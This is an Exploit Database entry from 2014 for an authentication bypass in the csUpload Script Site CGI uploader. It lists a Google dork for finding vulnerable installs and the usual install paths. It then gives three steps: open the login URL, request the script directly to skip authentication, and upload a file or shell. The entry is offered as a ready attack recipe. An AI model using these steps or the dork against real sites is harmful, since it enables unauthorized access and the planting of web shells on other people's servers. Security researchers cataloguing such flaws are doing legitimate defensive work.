csUpload Script Site - Authentication Bypass



EDB-ID: 32765 CVE: N/A OSVDB-ID: 105676
Author: Satanic2000 Published: 2014-04-09 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
# Exploit Title: ["csUpload Script Site" Authentication Bypass]
# Google Dork: [CSUpload.cgi?command=]
# Date: 4/9/2014
# Exploit Author: Satanic2000
# Vendor Homepage: http://www.cgiscript.net
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
# Version: 
# Tested on: linux
# www.Site.com/[path]/CSUpload/CSUpload.cgi
# [path] : /cgi-script/     or /cgi-bin/ or None

# Example:

# 1-  http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

# 2- Bypass Authentication  http://localhost/cgi-bin/CSUpload/CSUpload.cgi

# 3- Select Database Select Databases And Upload (File,Or Shell)

# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend